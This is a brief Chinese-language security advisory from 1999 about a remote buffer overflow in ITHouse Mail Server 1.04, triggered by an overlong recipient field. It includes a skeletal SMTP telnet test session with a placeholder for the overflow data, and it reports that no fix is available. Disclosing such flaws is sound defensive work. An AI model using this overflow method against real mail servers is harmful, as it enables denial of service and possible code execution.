ITHouse Mail Server 1.04远程溢出漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 ITHouse Mail Server v1.04详细描述 ITHouse mail server 1.04 存在一个远程溢出漏洞。攻击者会构造一封特殊的email,Email的 "收信人"字段中包含多于2270字节的数据,这将导致ITHouse mail服务器溢出,并可能执行任意代码。 测试代码 $ telnet ithouse.mail.com 25 HELO example.org MAIL FROM:example@example.org RCPT TO: + EIP DATA . QUIT 当Mail server发送这封邮件时将会发生溢出并崩溃。 解决方案 尚无 相关信息 |
